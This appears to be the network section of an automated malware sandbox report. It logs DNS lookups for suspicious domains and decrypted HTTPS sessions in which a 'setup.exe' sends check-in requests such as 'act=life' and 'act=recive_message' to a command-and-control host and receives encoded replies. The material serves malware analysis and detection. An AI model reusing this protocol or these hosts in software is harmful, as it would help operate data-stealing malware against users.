                                                                                                                            Jan 7, 2025 15:26:22.188802004 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:22.188991070 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:22.189325094 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:22.189337015 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:22.665229082 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:22.665292025 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:22.666543961 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:22.666553020 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:22.666791916 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:22.667973995 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:22.668133020 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:22.668164968 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:22.668216944 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:22.668225050 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:23.299185038 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:23.299283028 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:23.299386978 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.299763918 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.299787998 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:23.811206102 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.811248064 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:23.811361074 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.811825991 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.811839104 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.287530899 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.288140059 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.296412945 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.296433926 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.296715021 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.298532009 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.298886061 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.298896074 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.744048119 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.744143009 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.744391918 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.744391918 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.004736900 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.004798889 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.004868984 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.005532026 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.005547047 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.047332048 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.047357082 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.484349966 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.484416008 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.487384081 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.487396002 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.487677097 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.489001036 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.489124060 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.489130020 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.481734991 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.481869936 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.481995106 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.482156038 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.482183933 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.485601902 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.485651970 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.485726118 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.486093044 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.486109972 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.959435940 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.959507942 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.961389065 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.961400986 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.961652994 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.962930918 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.962953091 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.963002920 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:31.425195932 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:31.425290108 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:31.425362110 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:31.425621033 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:31.425638914 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:31.425651073 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:31.425657034 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:31.570050001 CET49823443192.168.2.7185.161.251.21
                                                                                                                            Jan 7, 2025 15:26:31.570077896 CET44349823185.161.251.21192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:31.570163012 CET49823443192.168.2.7185.161.251.21
                                                                                                                            Jan 7, 2025 15:26:31.570489883 CET49823443192.168.2.7185.161.251.21
                                                                                                                            Jan 7, 2025 15:26:31.570502996 CET44349823185.161.251.21192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:32.301898003 CET44349823185.161.251.21192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:32.302033901 CET49823443192.168.2.7185.161.251.21
                                                                                                                            Jan 7, 2025 15:26:32.317498922 CET49823443192.168.2.7185.161.251.21
                                                                                                                            Jan 7, 2025 15:26:32.317527056 CET44349823185.161.251.21192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:32.317814112 CET44349823185.161.251.21192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:32.319176912 CET49823443192.168.2.7185.161.251.21
                                                                                                                            Jan 7, 2025 15:26:32.359344006 CET44349823185.161.251.21192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:32.564456940 CET44349823185.161.251.21192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:32.564541101 CET44349823185.161.251.21192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:32.564703941 CET49823443192.168.2.7185.161.251.21
                                                                                                                            Jan 7, 2025 15:26:32.580003977 CET49823443192.168.2.7185.161.251.21
                                                                                                                            Jan 7, 2025 15:26:32.580025911 CET44349823185.161.251.21192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:32.580039978 CET49823443192.168.2.7185.161.251.21
                                                                                                                            Jan 7, 2025 15:26:32.580045938 CET44349823185.161.251.21192.168.2.7

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Jan 7, 2025 15:26:17.562438965 CET5562753192.168.2.71.1.1.1
                                                                                                                            Jan 7, 2025 15:26:17.577310085 CET53556271.1.1.1192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:31.463399887 CET6291553192.168.2.71.1.1.1
                                                                                                                            Jan 7, 2025 15:26:31.568305969 CET53629151.1.1.1192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:32.661422014 CET5230153192.168.2.71.1.1.1
                                                                                                                            Jan 7, 2025 15:26:32.670677900 CET53523011.1.1.1192.168.2.7

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Jan 7, 2025 15:26:17.562438965 CET192.168.2.71.1.1.10xcec4Standard query (0)fairiespar.cyouA (IP address)IN (0x0001)false
                                                                                                                            Jan 7, 2025 15:26:31.463399887 CET192.168.2.71.1.1.10x4e3aStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                            Jan 7, 2025 15:26:32.661422014 CET192.168.2.71.1.1.10xafe2Standard query (0)klipvumisui.shopA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Jan 7, 2025 15:26:17.577310085 CET1.1.1.1192.168.2.70xcec4No error (0)fairiespar.cyou188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                            Jan 7, 2025 15:26:17.577310085 CET1.1.1.1192.168.2.70xcec4No error (0)fairiespar.cyou188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                            Jan 7, 2025 15:26:31.568305969 CET1.1.1.1192.168.2.70x4e3aNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                            Jan 7, 2025 15:26:32.670677900 CET1.1.1.1192.168.2.70xafe2Name error (3)klipvumisui.shopnonenoneA (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • fairiespar.cyou
                                                                                                                            • cegu.shop

                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.749726188.114.97.34435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:18 UTC262OUTPOST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 8
                                                                                                                            Host: fairiespar.cyou
                                                                                                                            2025-01-07 14:26:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                            Data Ascii: act=life
                                                                                                                            2025-01-07 14:26:18 UTC1125INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:18 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=7m7usi1p9i43fjt07fbg0cumou; expires=Sat, 03 May 2025 08:12:57 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGwrufTpJuYyUPtu6p42PK1Y746WftpzHOxCLS%2FVyimC81W4zZtRd4Sl%2BVio5HOBIQymz7wHn73BujAyxsvKihbWkGMpv%2Bm5cOVS1uexJocu7Vw2YPyLs5OtzRohGwwfK%2BA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f3face342b5-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1746&rtt_var=682&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1672394&cwnd=218&unsent_bytes=0&cid=a7108cf90f9787ad&ts=511&x=0"
                                                                                                                            2025-01-07 14:26:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                            Data Ascii: 2ok
                                                                                                                            2025-01-07 14:26:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.749732188.114.97.34435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:19 UTC263OUTPOST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 78
                                                                                                                            Host: fairiespar.cyou
                                                                                                                            2025-01-07 14:26:19 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ALFA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                            2025-01-07 14:26:19 UTC1121INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:19 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=nkgpjshg6ulhn4b62iq690su3j; expires=Sat, 03 May 2025 08:12:58 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tms5bZwLhscuDd0fSebDIocL3CMh3C6Ixdl0GwnNRotZR4%2B5Bvay3q0m%2FjU5OmRdww9rFeS4Ru0xFNY6BnBLdquRIdHt4YcBE8hrkHPYM3g2UsPT2t2BtvpAJrs6bLCUoLo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f462d6cefa9-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2023&rtt_var=777&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=977&delivery_rate=1393129&cwnd=158&unsent_bytes=0&cid=6e11951220dca7fe&ts=448&x=0"
                                                                                                                            2025-01-07 14:26:19 UTC248INData Raw: 34 36 38 0d 0a 79 58 6a 4e 7a 4c 66 4b 79 30 59 50 55 69 4b 53 37 65 46 63 6c 77 31 4c 48 54 58 61 68 43 77 79 62 33 44 34 61 73 61 6d 6c 52 47 79 57 72 76 75 6a 66 37 6e 5a 48 77 33 41 4b 69 4c 67 44 44 6b 61 47 63 2f 56 4c 36 6d 46 6c 51 4f 48 49 73 50 36 6f 54 6a 66 4f 74 43 71 36 33 62 75 61 35 71 4c 54 64 61 73 4e 65 36 4a 37 56 6f 4a 54 38 50 2b 4f 46 47 55 41 34 63 6d 67 75 74 79 65 56 39 71 68 43 68 71 39 2b 76 71 43 4a 75 50 6b 2f 33 69 49 51 39 2f 57 4d 69 63 46 32 33 70 67 41 51 43 67 72 61 55 4f 54 72 38 47 57 6f 4e 61 79 2f 33 4f 69 32 61 6e 52 77 52 2f 7a 50 32 33 37 32 61 43 6c 78 55 37 37 76 52 46 6f 48 46 4a 73 4f 72 4e 62 38 64 36 45 51 72 36 6a 65 70 61 45 32 59 7a 52 49 2f 49 36 4f 50 62 55 68 61 58 68 50 2b 4c 34
                                                                                                                            Data Ascii: 468yXjNzLfKy0YPUiKS7eFclw1LHTXahCwyb3D4asamlRGyWrvujf7nZHw3AKiLgDDkaGc/VL6mFlQOHIsP6oTjfOtCq63bua5qLTdasNe6J7VoJT8P+OFGUA4cmgutyeV9qhChq9+vqCJuPk/3iIQ9/WMicF23pgAQCgraUOTr8GWoNay/3Oi2anRwR/zP2372aClxU77vRFoHFJsOrNb8d6EQr6jepaE2YzRI/I6OPbUhaXhP+L4
                                                                                                                            2025-01-07 14:26:19 UTC887INData Raw: 4f 41 7a 38 52 69 78 6d 78 79 65 64 31 36 77 58 68 74 35 57 76 70 57 51 31 63 45 6a 38 67 59 59 39 2b 6d 67 6f 66 30 57 33 35 6b 31 59 42 52 61 51 42 36 76 4c 2b 58 6d 73 45 71 61 70 32 71 2b 68 49 6d 49 7a 41 4c 37 50 68 43 61 31 4e 32 6c 66 52 37 76 6c 57 6c 30 63 55 6f 56 47 76 59 54 77 66 2b 74 43 37 36 6a 62 71 61 51 6b 66 7a 68 4c 2b 34 71 52 4e 66 78 69 4a 48 39 61 73 75 6c 4e 55 41 6f 59 6b 41 65 75 77 50 70 2b 72 52 71 76 37 70 76 6f 72 6a 77 74 61 41 44 54 69 70 4d 35 2b 58 6c 72 52 52 65 6e 71 46 63 51 43 68 37 61 55 4f 54 4d 38 6e 43 6f 45 61 43 74 33 61 4f 37 4a 48 38 32 54 66 57 64 68 54 76 37 5a 53 70 74 58 62 62 67 54 56 6b 47 47 35 38 50 6f 49 53 35 4d 36 77 43 37 2f 61 56 69 61 51 76 59 54 70 58 38 4d 2b 63 63 4f 77 76 4c 6e 4d 58 34 4b
                                                                                                                            Data Ascii: OAz8Rixmxyed16wXht5WvpWQ1cEj8gYY9+mgof0W35k1YBRaQB6vL+XmsEqap2q+hImIzAL7PhCa1N2lfR7vlWl0cUoVGvYTwf+tC76jbqaQkfzhL+4qRNfxiJH9asulNUAoYkAeuwPp+rRqv7pvorjwtaADTipM5+XlrRRenqFcQCh7aUOTM8nCoEaCt3aO7JH82TfWdhTv7ZSptXbbgTVkGG58PoIS5M6wC7/aViaQvYTpX8M+ccOwvLnMX4K
                                                                                                                            2025-01-07 14:26:19 UTC1369INData Raw: 33 36 32 30 0d 0a 4c 73 42 73 4a 33 46 51 72 71 5a 52 48 68 52 53 6e 51 54 6b 6e 4c 64 38 70 42 57 6e 72 74 53 73 70 43 42 73 50 55 7a 35 6a 49 38 79 2f 57 49 6c 65 31 69 77 37 6b 31 59 48 78 79 55 44 71 4c 45 38 6a 50 6c 57 71 69 32 6c 66 44 70 41 47 4d 6e 56 50 76 4e 74 6a 33 37 59 53 35 70 46 36 65 6f 56 78 41 4b 48 74 70 51 35 4d 72 36 65 4b 63 64 70 71 2f 57 71 4b 4d 71 59 6a 70 49 2b 49 2b 4f 50 2f 35 6e 4c 33 4a 63 74 2b 6c 4a 57 41 34 65 6e 77 57 6e 68 4c 6b 7a 72 41 4c 76 39 70 57 4e 70 79 64 38 49 51 4c 46 6a 49 30 77 38 6e 6c 70 59 42 6d 68 70 6b 6c 63 54 55 72 61 41 71 50 44 38 33 36 68 47 61 75 71 32 4b 65 67 4c 57 51 69 53 76 79 42 6b 54 50 2f 61 69 64 7a 55 72 66 6d 54 31 45 44 47 4a 46 49 36 6f 54 77 61 2b 74 43 37 34 48 59 75 4c 73 75 5a
                                                                                                                            Data Ascii: 3620LsBsJ3FQrqZRHhRSnQTknLd8pBWnrtSspCBsPUz5jI8y/WIle1iw7k1YHxyUDqLE8jPlWqi2lfDpAGMnVPvNtj37YS5pF6eoVxAKHtpQ5Mr6eKcdpq/WqKMqYjpI+I+OP/5nL3Jct+lJWA4enwWnhLkzrALv9pWNpyd8IQLFjI0w8nlpYBmhpklcTUraAqPD836hGauq2KegLWQiSvyBkTP/aidzUrfmT1EDGJFI6oTwa+tC74HYuLsuZ
                                                                                                                            2025-01-07 14:26:19 UTC1369INData Raw: 50 68 43 61 31 4e 32 6c 51 56 4b 37 73 44 6b 39 44 43 39 6f 50 71 49 53 76 4d 36 45 57 71 36 33 5a 6f 61 55 70 62 44 52 48 2f 59 75 44 4f 50 4e 71 4b 48 52 66 74 4f 6c 45 58 41 6b 65 6b 77 36 6f 78 2f 52 31 36 31 54 76 71 63 33 6f 38 57 52 4d 50 55 76 38 6a 34 41 76 38 69 39 6e 50 31 6d 2b 35 67 34 49 47 77 4b 4e 44 37 75 4b 37 6a 4f 73 46 75 2f 32 6c 61 4b 37 49 57 4d 30 53 76 57 4c 6a 7a 54 31 61 6a 74 33 55 62 2f 71 52 6c 55 43 46 4a 38 46 6f 38 2f 30 59 62 6b 5a 71 36 44 5a 36 4f 64 6b 61 69 67 41 71 4d 2b 6d 4b 66 5a 2f 4c 33 77 58 70 36 68 58 45 41 6f 65 32 6c 44 6b 78 50 6c 2f 6f 42 32 6b 70 64 47 73 71 53 6c 6d 50 6b 37 35 67 34 73 79 38 6e 30 6b 65 6c 2b 79 37 30 74 63 41 42 47 49 43 36 57 45 75 54 4f 73 41 75 2f 32 6c 59 2b 61 45 30 35 77 58 37
                                                                                                                            Data Ascii: PhCa1N2lQVK7sDk9DC9oPqISvM6EWq63ZoaUpbDRH/YuDOPNqKHRftOlEXAkekw6ox/R161Tvqc3o8WRMPUv8j4Av8i9nP1m+5g4IGwKND7uK7jOsFu/2laK7IWM0SvWLjzT1ajt3Ub/qRlUCFJ8Fo8/0YbkZq6DZ6OdkaigAqM+mKfZ/L3wXp6hXEAoe2lDkxPl/oB2kpdGsqSlmPk75g4sy8n0kel+y70tcABGIC6WEuTOsAu/2lY+aE05wX7
                                                                                                                            2025-01-07 14:26:19 UTC1369INData Raw: 37 53 39 78 50 33 75 37 36 55 55 51 45 6c 79 44 53 4b 50 49 74 79 76 72 48 61 65 6d 32 36 75 76 4c 32 45 38 51 66 6d 4a 68 6a 62 79 59 43 35 32 55 4c 6a 67 58 46 63 41 47 35 6f 44 72 63 37 7a 63 71 42 61 34 65 37 53 73 4f 6c 38 4c 51 4a 48 35 70 2b 41 66 75 6f 68 4d 44 39 51 74 4b 59 57 45 41 41 41 6d 77 32 32 77 50 68 34 75 52 47 70 72 74 43 36 72 69 68 6e 50 30 50 34 67 6f 41 32 35 32 38 6b 66 30 57 71 34 45 56 65 54 56 7a 61 44 37 79 45 72 7a 4f 61 44 61 54 75 79 75 61 77 5a 47 6f 38 41 4b 6a 50 67 44 54 34 59 54 74 37 55 62 50 6c 51 46 67 49 47 70 34 43 71 63 76 38 65 61 49 53 72 36 48 51 6f 4b 49 69 59 7a 46 47 2f 49 4c 44 63 4c 56 6f 4d 54 38 50 2b 4d 46 55 58 51 73 46 69 7a 32 6a 78 4b 59 7a 74 46 53 32 37 74 4b 6b 36 58 77 74 50 55 7a 36 67 6f 59
                                                                                                                            Data Ascii: 7S9xP3u76UUQElyDSKPItyvrHaem26uvL2E8QfmJhjbyYC52ULjgXFcAG5oDrc7zcqBa4e7SsOl8LQJH5p+AfuohMD9QtKYWEAAAmw22wPh4uRGprtC6rihnP0P4goA2528kf0Wq4EVeTVzaD7yErzOaDaTuyuawZGo8AKjPgDT4YTt7UbPlQFgIGp4Cqcv8eaISr6HQoKIiYzFG/ILDcLVoMT8P+MFUXQsFiz2jxKYztFS27tKk6XwtPUz6goY
                                                                                                                            2025-01-07 14:26:19 UTC1369INData Raw: 57 41 5a 6f 61 5a 4a 58 45 31 4b 32 67 61 70 77 76 5a 79 6f 78 4b 76 71 4e 2b 73 71 69 31 75 4e 30 6e 32 68 49 41 30 2b 6d 67 76 65 31 65 7a 34 55 42 57 43 42 6d 54 53 4f 71 45 38 47 76 72 51 75 2b 49 39 72 71 37 46 6d 4d 7a 57 37 43 51 7a 53 65 31 61 43 55 2f 44 2f 6a 74 52 6c 38 66 46 35 4d 41 6f 4d 33 33 64 36 45 58 71 4b 37 51 70 61 77 67 59 7a 52 48 38 49 4f 4d 4f 66 31 67 4c 58 39 59 2b 4b 67 4f 56 78 56 53 77 6b 69 45 7a 2b 46 53 70 52 47 39 37 73 72 6d 73 47 52 71 50 41 43 6f 7a 34 30 33 39 47 63 6e 63 31 2b 38 39 45 35 62 42 42 32 62 42 36 54 48 39 6e 6d 6a 43 4b 6d 75 33 71 43 75 4c 47 6b 2b 55 76 47 41 77 33 43 31 61 44 45 2f 44 2f 6a 58 57 46 63 4b 48 64 67 68 6f 39 2f 32 65 61 67 52 6f 2b 37 4b 35 72 42 6b 61 6a 77 41 71 4d 2b 4f 4d 76 68 72
                                                                                                                            Data Ascii: WAZoaZJXE1K2gapwvZyoxKvqN+sqi1uN0n2hIA0+mgve1ez4UBWCBmTSOqE8GvrQu+I9rq7FmMzW7CQzSe1aCU/D/jtRl8fF5MAoM33d6EXqK7QpawgYzRH8IOMOf1gLX9Y+KgOVxVSwkiEz+FSpRG97srmsGRqPACoz4039Gcnc1+89E5bBB2bB6TH9nmjCKmu3qCuLGk+UvGAw3C1aDE/D/jXWFcKHdgho9/2eagRo+7K5rBkajwAqM+OMvhr
                                                                                                                            2025-01-07 14:26:19 UTC1369INData Raw: 2f 71 44 67 68 4e 47 5a 51 4e 70 63 6a 39 64 4b 55 49 72 71 54 5a 71 61 34 6a 5a 69 4a 4c 34 6f 53 4c 50 66 74 6e 49 48 39 5a 75 4f 64 44 55 45 31 63 32 67 2b 38 68 4b 38 7a 6a 6a 6d 34 75 4e 2f 71 69 6a 4e 37 4f 6b 66 38 6d 59 67 2f 39 6e 6b 6b 62 78 66 32 70 6c 39 58 48 46 4c 43 48 72 54 54 38 47 7a 6c 41 2b 2b 70 32 65 6a 78 5a 47 59 2f 54 76 32 45 68 7a 66 77 5a 79 70 36 55 72 4c 71 51 6c 45 46 47 35 41 4e 6f 63 4c 39 63 4b 55 56 72 71 4c 52 6f 61 63 74 4c 58 34 41 39 35 66 44 5a 72 56 5a 4f 58 68 50 74 66 59 4d 59 67 34 44 69 78 32 70 31 50 45 78 68 42 6d 6a 72 64 43 76 75 57 52 79 66 6c 6d 77 69 49 39 2b 72 53 38 70 65 31 75 37 34 55 42 66 41 42 32 64 41 36 76 4f 2b 57 47 6b 48 36 65 69 33 61 57 37 4c 6d 63 69 53 66 6d 43 6a 54 62 6e 62 47 6b 78 46
                                                                                                                            Data Ascii: /qDghNGZQNpcj9dKUIrqTZqa4jZiJL4oSLPftnIH9ZuOdDUE1c2g+8hK8zjjm4uN/qijN7Okf8mYg/9nkkbxf2pl9XHFLCHrTT8GzlA++p2ejxZGY/Tv2EhzfwZyp6UrLqQlEFG5ANocL9cKUVrqLRoactLX4A95fDZrVZOXhPtfYMYg4Dix2p1PExhBmjrdCvuWRyflmwiI9+rS8pe1u74UBfAB2dA6vO+WGkH6ei3aW7LmciSfmCjTbnbGkxF
